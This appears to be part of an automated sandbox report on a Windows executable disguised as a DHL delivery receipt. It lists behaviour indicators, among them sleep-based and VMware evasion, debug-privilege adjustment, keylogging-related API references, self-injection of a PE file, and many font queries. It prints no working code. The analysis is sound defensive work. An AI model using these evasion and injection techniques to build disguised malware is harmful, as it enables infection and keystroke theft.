Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98296s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98187s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -98078s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97531s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97421s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97312s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -97093s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -96984s >= -30000s
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe TID: 768	Thread sleep time: -922337203685477s >= -30000s

Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, ???WW?????????????????????????W?W????????????.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, ?W?W???????WW???W???W??????WyW????uy????????u.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Memory written: C:\Users\user\Desktop\Recibo de entrega de DHL.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Process created: C:\Users\user\Desktop\Recibo de entrega de DHL.exe C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Source: Recibo de entrega de DHL.exe, 00000005.00000002.906239903.0000000001700000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906239903.0000000001700000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906239903.0000000001700000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906239903.0000000001700000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Users\user\Desktop\Recibo de entrega de DHL.exe VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
